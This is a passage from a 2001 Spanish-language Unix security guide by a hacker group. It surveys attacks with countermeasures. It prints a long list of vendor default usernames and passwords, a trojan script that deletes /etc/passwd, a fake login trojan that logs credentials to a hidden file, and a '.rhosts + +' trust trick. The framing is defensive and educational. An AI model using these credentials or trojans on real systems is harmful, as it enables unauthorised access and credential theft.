no es conveniente que nadie pueda jugar libremente con nuestro sistema. 






-------------------------------------------------------------------------------------------------
------------[3.1.2 DENIAL OF SERVICE Y NUKES ]---------------------------------------------------
-------------------------------------------------------------------------------------------------
                                         

        El objetivo de estos ataques no suele ser la penetracion ni la obetncion de privilegios 
en la maquina remota, es simplemente colapsarla y hacerla caer. De este tipo de ataques el mas
peligroso y daino es el DoS (denegacion de servicio), los dos son exploits remotos que explotan
alguna vulnerabilidad del sistema (o de alguno de sus demonios) y lo hacen caer. Los nukes son 
mas sencillos de ejecutar (tipico ataque lammer) y por lo general poco efectivos, pero pueden 
causar incluso la caida de una maquina mal protegida, no explico el funcionamiento de los nukes 
porqe supongo que todos lo conoceis :). 
	
	La solucion al primer ataque es estar a la ultima en bugs de sistemas operativos (para
ello visita la web de tu so y listas como bugtraq) y tener bien parcheado el sistema. LA 
solucion a los nukes simplemente consiste en tener unas buenas reglas de firewalling, con 
la sencilla linea (en linux) ipchains -A input -p icmp --icmp-type 0 -j REJECT evitamos un 
ataque basado en nukes icmp. Como veis es muy sencillo proteger el sistema de estwe tipo de ataques.








-------------------------------------------------------------------------------------------------
------------[3.1.3 OBTENCION DE SHELL MEDIANTE CRACKEO ]-----------------------------------------
-------------------------------------------------------------------------------------------------
                                       

	Uno de los metodos mas usados para tener acceso a un sistema (y el que siempre sale en 
las pelis xD) es el crackeo de passwd. Supongamos que un usuario entra a nustro sistema como
guest y accede al directorio /etc, alli obtiene el archivo passwd y ya en su localhost lo
crackea con una herramienta como john de ripper. En ese caso el atacante ya tendria acceso a
nuestro sistema y solo le qedaria rootearlo. Con el uso de contraeas encriptadas con el 
algorritmo md5 y ash el crackeo de passwd es cada vez mas dificil, pero para crackear una
de estas por medio de un diccionario (por fuerza bruta es mas dificil) no se necesita gran 
capacidad de computo, hoy en dia cualquier persona con un simple pentium puede realizr esto
sin invertir excesiva cantidad de tiempo.
	
	El uso de shadowed password complica enormemente la obtencion de tales contraseas,
pero no simplemente por tener las passwd en shadow tenemos que pensar que nuestro sistema es
seguro a este tipo de ataques. Para tener cierta seguridad es conveniente convinar las shadow
con los metodos anteriormente citados (como uso de ssh en lugar de telnet, filtrado de 
paquetes...) y como no es imprescindble renobar las contraseas cada poco tiempo, asi como 
hacerlas lo mas dificiles posibles.









-------------------------------------------------------------------------------------------------
------------[3.1.4 SNIFFING Y KEY RECORDING  ]---------------------------------------------------
-------------------------------------------------------------------------------------------------
                                       
 
	El sniffing puede ser un ataque remoto o bien local, los ataques mas comunes de este tipo 
se producen cuando un pirata se hace con el control de una maquina de la red e instala un programa 
que loggea el trafico de red para asi obtener contraseas y acceso a otras maquinas de la red.
Otro tipo de ataque mas complejo y que se consideraria remoto seria el caso de que el atacante 
pinchase la linea telefonica o puesiese en la linea telefonica un aparato que grabase el trafico
de red. El key recording consiste en instalar un programa que logea todo lo que el usuario teclea,
lo cual puede comprometer la seguridad del sistema de forma muy grave. Si nos topamos con 
algunos de estos programas en nuestra red lo mas posible es que la seguridad de nuestro 
sistema ya haya sido violada, con lo cual ya sabes, a revisar logs ya a revisar el sistema.
	
	Para el sniffing una muy buena solucion es instalar algun programa de deteccion de 
estos y el uso de informacion cifrada en las transmisiones entre la red (por ejemplo al
usar ssh en vez de telnet la informacion va cifrada con lo cual el atacante no puede
hacer uso de la informacion) con programas como ssh, pgp etc... Contra el key recording la 
segunda solucion no es valida por la naturaleza misma del ataque, pero el uso de programas 
detectores es muy util.








-------------------------------------------------------------------------------------------------
------------[3.1.5 CUENTAS POR DEFECTO  ]--------------------------------------------------------
-------------------------------------------------------------------------------------------------
                                       
   
	La mayoria de los sistemas operativos traen cuentas por defecto, no profundizare 
mucho en esto porqe su finalidad es obvia :). Lo que si hare sera incluir un listado 
de passwd por defecto para algunos sistemas operativos tipo Unix. Aqi va la lista:

Hewlett Packard MPE-XL                                                                 
                                                                                              
HELLO           MANAGER.SYS                                                                 
HELLO           MGR.SYS                                                                 
HELLO           FIELD.SUPPORT                                                         
HELLO           OP.OPERATOR                                                                 
MGR             CAROLIAN                                                                 
MGR             CCC                                                                 
MGR             CNAS                                                                 
MGR             CONV                                                                 
MGR             COGNOS                                                                 
OPERATOR        COGNOS                                                                 
MANAGER         COGNOS                                                                 
OPERATOR        DISC                                                                 
MGR             HPDESK                                                                 
MGR             HPWORD                                                                 
FIELD           HPWORD                                                                 
MGR             HPOFFICE                                                              
ADVMAIL         HPOFFICE                                                                 
MAIL            HPOFFICE                                                                 
WP              HPOFFICE                                                                 
MANAGER         HPOFFICE                                                                 
MGR             HPONLY                                                                 
FIELD           HPP187                                                                 
MGR             HPP187                                                                 
MGR             HPP189                                                                 
MGR             HPP196                                                                 
MGR             INTX3                                                                          
MGR             ITF3000                                                                 
MANAGER         ITF3000                                                                 
MAIL            MAIL                                                                 
MGR             NETBASE                                                                 
MGR             REGO                                                                 
MGR             RJE                                                                 
MGR             ROBELLE                                                                 
MANAGER         SECURITY                                                                 
MGR             SECURITY                                                                 
FIELD           SERVICE                                                                 
MANAGER         SYS                                                                 
MGR             SYS                                                                 
PCUSER          SYS                                                                 
RSBCMON         SYS                                                                 
OPERATOR        SYS                                                                 
OPERATOR        SYSTEM                                                                 
FIELD           SUPPORT                                                                 
OPERATOR        SUPPORT                                                                 
MANAGER         TCH                                                                 
MAIL            TELESUP                                                                 
MANAGER         TELESUP                                                                 
MGR             TELESUP                                                                 
SYS             TELESUP                                                                 
MGE             VESOFT                                                                 
MGE             VESOFT                                                                 
MGR             WORD                                                                 
MGR             XLSERVER                                                                 
                                                                 
System 75                                                                 
                                                                 
bcim            bcimpw                                                                 
bciim           bciimpw                                                                 
bcms            bcmspw, bcms                                                                 
bcnas           bcnspw                                                                 
blue            bluepw                                                                 
browse          looker, browsepw                                                                 
craft           crftpw, craftpw, crack                                                       
cust            custpw                                                                 
enquiry         enquirypw                                                                 
field           support                                                                 
inads           indspw, inadspw, inads                                                    
init            initpw                                                                 
kraft           kraftpw                                                                 
locate          locatepw                                                                 
maint           maintpw, rwmaint                                                                 
nms             nmspw                                                                 
rcust           rcustpw                                                                 
support         supportpw                                                                 
tech            field                                                                 
                                                                                              
Unix                                                                 
                                                                                              
root            root                                                                 
root            system                                                                 
sys             sys                                                                 
sys             system                                                                 
daemon          daemon                                                                 
uucp            uucp                                                                 
tty             tty                                                                 
test            test                                                                 
unix            unix                                                                 
unix            test                                                                 
bin             bin                                                                 
adm             adm                                                                 
adm             admin                                                                 
admin           adm                                                                 
admin           admin                                                                 
sysman          sysman                                                                 
sysman          sys                                                                 
sysman          system                                                                 
sysadmin        sysadmin                                                                 
sysadmin        sys                                                                 
sysadmin        system                                                                 
sysadmin        admin                                                                 
sysadmin        adm                                                                  
who             who                                                                  
learn           learn                                                                 
uuhost          uuhost                                                                 
guest           guest                                                                 
host            host                                                                 
nuucp           nuucp                                                                 
rje             rje                                                                 
games           games                                                                 
games           player                                                                 
sysop           sysop                                                                 
root            sysop                                                                 
demo            demo                
	
	Esta claro que la unica solucion contra este tipo de ataques es la localizacion 
y desactivacion de tales. Recuerda que no hay peor enemigo de un administrador que la pereza :P.








-------------------------------------------------------------------------------------------------
------------[3.2   ATAQUES LOCALES ]-------------------------------------------------------------
-------------------------------------------------------------------------------------------------
                                         
	Una vez que el atacante haya consegido acceso no privilegiado a nuestro sistema lo mas
posible es que qiera aumentar sus privilegios al meximo y hacerse root, es obvio que si 
consige eso... estamos perdidos, pero para eso estamos, para evitarlo :). Tenemos que
tener en cuenta un factor muy importante que a primera vista puede parecer trivial : 
el tipo de atacante. No es lo msimo que nos ataqe el tipico hacker de irc que solo qiere 
hackearnos para contar su hazaa a sus amigotes en canales como #hack o #hackers que
enfrentarnos a un verdadero hacker que se encapricha con nuestra red. El primer tipo
ante las minima adversidad se dara la vuelta y se fijara en otro sistema mas sencillo.
El segundo es mas complicado desacerse de el, y si el individuo en cuestion sabe 
mucho es dificil pararlo, pero hay que ponerselo lo mas dificil posible. Los ataques que se
describen a continuacion son mas propios del primer tipo de atacante y por ello seran 
los que mas veces suframos, aunqe con alguno de estos metodos se han hecho grandes hackeos :). 











-------------------------------------------------------------------------------------------------
------------[3.2.1 EXPLOITS ]--------------------------------------------------------------------
-------------------------------------------------------------------------------------------------

	Estos ataques son muy frecuentes por parte de atacantes poco experiemntados, 
qe en la mayoria de casos no saben nada de unix y ni siqiera saben que coo hace el 
exploits, lo que generalmente suelen hacer con los exploits es probar cantidades 
ingentes de ellos hasta que uno va bien. De los exploits has de saber (creo que todo el
mundo lo sabe, peor bueno) que son programillas que se compilan y ejecutan en un sistema 
remoto y que explotan algun bug en alguno de los demonios, programas con suid.. 
del sistema operativo. La mayoria de los xploits comprometen la seguridad del root local
pero hay muchos y muy diferentes (consulta rootshell.com y otras). Por muy reciente que 
sea tu version del SO no puedes bajar la guardia ya que constantemente estan apareciendo 
bugs ( y los xploits correspondientes). 
	
	La mejor de las soluciones ( y casi la unica) es estar al dia de los bugs de los
sistemas operativos, instalar los parches que surgen y como no actualizar cada cierto 
tiempo programas problematikos como sendmail y algunos demonios del sistema etc.. 
Tambien es conveniente a la hora de instalar un sistema tener en cuenta lo problemtico que es 
cada uno (por ejemplo el openbsd en ese campo es una joya).









-------------------------------------------------------------------------------------------------
------------[3.2.2 TROYANOS Y DEMAS ]------------------------------------------------------------
-------------------------------------------------------------------------------------------------                                  

	Los troyanos en unix no tiene nada que ver con sus hononimos en win2. Estos pueden ser
muy diversos, y suelen ser usados de dos formas dependiendo de los privilegios del atacante
en el sistema. Si el atacante carece de privilegios lo que seguramente intente sera colocar 
un programa llamado ls (por ejemplo) en su home directory, asi cuando el root liste el 
contenido del directorio del atacante se ejecutara este programa en vez del ls original.
Esto, claro, solo ocurrira si el root tiene mal configurado el path de busqeda y tiene
algo asi (algo muy frecuente) $PATH=./:/usr/sbin:/bin:/sbin:/usr/sbin . Observas el 
error? observese que en primer lugar se encuentra el directorio actual, con lo cual 
cuando el sistema busque un programa llamdo ls encontrara primero el troyano que el
original. Un problema tambien seria el tener $PATH:/usr/sbin:/bin:/sbin:./ , en 
este caso si el atacante coloca un troyano llamado lrs en home y el root se eqivoca 
y en vez de ls escribe lrs se ejecutara este con consecuencias que podrian ser 
desastrosas si contuviese:

if test -f /etc/passwd
do 
   rm -rf /etc/passwd > /dev/null
else
   exit 1; > /dev/null

Si el atacante tiene privilegios de root lo normal es que sustituya directamente 
la orden, lo mas normal es que no incluya un troyano como el anterior sino algo parecido a esto:

clear
printf "`uname -n` login: "
read login
stty -echonl -echo
printf "Password: "
read pass
echo "$login : $pass" >>/tmp/.claves
printf "\nLogin incorrect"
echo 
exec /bin/login.old

lo que en este caso el atacante haria seria suplantar el login original 
por este troyano y renombrar al primero como login.old. Asi cuando un 
user hace login el sistema le da error, este piensa que se ha equivocao 
y al intrducir de nuevo su clave se ejecuta el login normal. :). Normalmente 
los troyanos seran mucho mas elborados y complejos que este shell script, pero para explicarlo vale.
	
	La unica forma de detectar estos troyanos es al notar un aumento sospechoso
del tamao de algunos, tambien existen formas muy seguras y complejas como programas
qe hacen copias de seguridad de los programas de shell y despues periodicamente compara 
los que tiene en la base de datos (tamao etc..) con los que hay en el sistema, asi 
pudiendo detectar facilemnte troyanos y demas fauna. La mayoria de virus (que haberlos hailos) 
y demas se basan en este tipo de ataqes, con lo que no merece la pena analizarlos aparte. 
Sobre este tema decir que nunca hay que ejecutar un rpograma en unix sin saber que es, y 
menos como root, pero como user tambien nos puede "putear" con los miticos programas 
qe crean miles de procesos fork y agotan la memoria del sistema.
	
	Tema aparte pero que no se puede pasar por alto son los backdors. Por backdor 
se entienden dos cosas, la primera es una contrasea "maestra" que los programadores 
ponen en sus programas para acceder a ellos mas rapidamente, lo cual solo constituye 
un problema si algien se enetera de cual es dicha contrasea. El segundo tipo se 
refiere a programas que un atacante suele dejar una vez violada la seguridad del 
sistema para poder acceder a nuestro sistema con privilegios de root siempre que 
qieran, un ejemplo de backdor tipico seria una shell con suid activado. 
La mejor forma de evitar estos ataques es previniendolos, o caso de ser ienvitable 
se pueden detectar por los mismos medios que los troyanos. 








-------------------------------------------------------------------------------------------------
------------[3.2.3 ATAQUES "MANUALES" ]----------------------------------------------------------
-------------------------------------------------------------------------------------------------                                      

	Por ataques manuales debemos entender todos esos ataques que se realizan sin 
usar ninguna herramienta. Estos ataqes generalmente son llevados a cabo 
por persoans con elevados conociemintos informaticos y se basan en fallos 
de configuarcion de cualquier elemnto del sistema.Un ejemplo de ataque manual 
es el tipico de obtencion de shell mediante rhost. Basicamente consiste en montar 
el directorio home remoto en tu localhost, introducir en tu /etc/passwd una entrada 
a ese sistema, aadir en el home del usuario hackeado un archivo .rhosts que contenga + + y
el tacante tendra acceso como si de un user se tratara. Esto a priori no parece muy 
peligroso, pero una vez hecho esto el atacante puede comprometer remotamente los privilegios 
de una cuenta con privilegios de escritura sobre /etc/passwd y modificarlo (por ejm. la cuenta bin).
Esto lo haria haciendo un ssh al computador objetivo, y como el sistema de archivos esta montado 
en su sistema local le daria acceso (esto no es exactamente asi pero como explicacion vale :P)
	La defensa mas sencilla contra este tipo de ataques es la de siempre, revisar los posibles
fallos de configuracion del sistema, los posibles bugs etc... 







-------------------------------------------------------------------------------------------------
------------[3.2.4 OTROS  ]----------------------------------------------------------------------
-------------------------------------------------------------------------------------------------                                         

	Existen multitud de ataques de diferentes clases que no detallare por motivos 
de espacio, pero si citare un caso que me parece interesante, que es el de las tecnicas de 
ocultacion de ip. Cuando nuestro sistema sucumba a un profesional seguramente se 
preocupara de borrar los ficheros de log, abra enmascarado su ip y un largo etc.... 
lo que nos hara mas dificil la tarea no solo ya de encontrar al culpable (qe a mi 
juicio nadie tiene que pagar nuestros errores) sino de localizar los "regalitos" que 
nos haya podido dejar, si el atacante logra enmascarar y hacer inapreciable su ataque 
la seguridad de nuestro sistema estara totalmente comprometida, porqe podra entrar 
siempre que qiera. Por eso como he dicho anteriormente lo mejor es prevenir los ataques, 
porqe sino despues pude ser demasiado tarde.
 	
	Aparte de los ataques anteriormente descritos nuestro sistema puede sufrir 
diversas eventualidades, muchas de ellas ocasionadas por una mala gestion del sistema 
o por catastrofes naturales :). Al administrar un sistema informatico no podemos pasar 
por alto que el sistema a de estar en un lugra seguro, a de contar con fusibles de 
emergencia, abastecedores de energia en caso de que se vaya la luz... aunqe si no 
qeremos gastarnos un dineral conviene prevenir situaciones de riesgo (apagar el 
equipo en caso de tormenta etc..). .







-------------------------------------------------------------------------------------------------
------------[3.3   CONCLUSIONES ]----------------------------------------------------------------
-------------------------------------------------------------------------------------------------
                                        
	Creemos haber dejado claro con el texto que nuestro ordenador puede ser victima 
de muchisimos ataques en la red, ataques, que en su mayoria, son muy faciles de evitar. 
Si al leer este texto has aprendido algo o te has concienciado de que debes dedicar mas 
tiempo a la seguridad de tu sistema el objetivo del mismo esta cumplido :). Lo que no se 
puede negar es que hoy en dia es rentable invertir un minimo de tiempo en la seguridad, 
claro esta que si tu maquina es un simple pc conectado a internet no te compensaran 
algunas de las medidas aqi expuestas pero estate seguro de que si no tomas en cuenta estos 
consejos tarde o temprano te llevaras un susto (te lo digo por experiencia:) ). 

                                                                                        
  







-------------------------------------------------------------------------------------------------
------------[3.4   DESPEDIDA ]----------------------------------------------------------------------
-------------------------------------------------------------------------------------------------                  

                                                                                          
Esta informacion es de libre distribucion siempre y cuando no cambies el nombre del autor.
                                                                                           
Espero que os haya gustado, y que no la useis para malos fines, puesto que un hacker no
se dedica a ir por la vida destrozando websites.                                                 
                                                                                           
ExidE ----> orifize@terra.es

PrOxYnE-X ----> proxyne@yahoo.es

Bueno pues sin mas nos despedimos y.... suerte ahi fuera                                                                                           
                                                                                           
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^^~^~^~^~^~^~^~^~^
                                                                                           






---------------------------------------------------
-       CONTACTA CONMIGO O CON EL TEAM            -
---------------------------------------------------
- NICK:	ExidE                                 - 
- MAIL:     orifize@terra.es        	        -	
---------------------------------------------------
- NICK:	PrOxYnE-X                             - 
- MAIL:     proxyne@yahoo.es        	        -	
---------------------------------------------------
---------------------------------------------------
- TEAM:     disidents@yahoo.es                    -
---------------------------------------------------





                                                                                           
 

                                                                                          
                                                                                           

 								            Disidents Espaa  2001 2 edicion.
------------------------------------------------------------------------------------------------

                     @@-------               @@---------------  
		    @@----                  @@---------       @@@@@@@@@  
		   @@--     @@@@@--        @@-- @@@@@       @     @@  @@@@@@@@@@@@@@@@@@@@@@@@@@@@-------
              @@@@@@    @@ @@      @@ @@@@@@-  @@      @@@ @    @@  @@-----------------------------
             @@        @@ @@@@@   @@ @@---    @@@@@@   @@ @@   @@  @@@@@--------------
            @@        @@     @@  @@ @@ -     @@       @@ @@   @@      @@----------
             @@@@@@@ @@  @@@@@@ @@   @@@@@@@ @@@@@@@ @@  @@ @@	     @@--------
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@------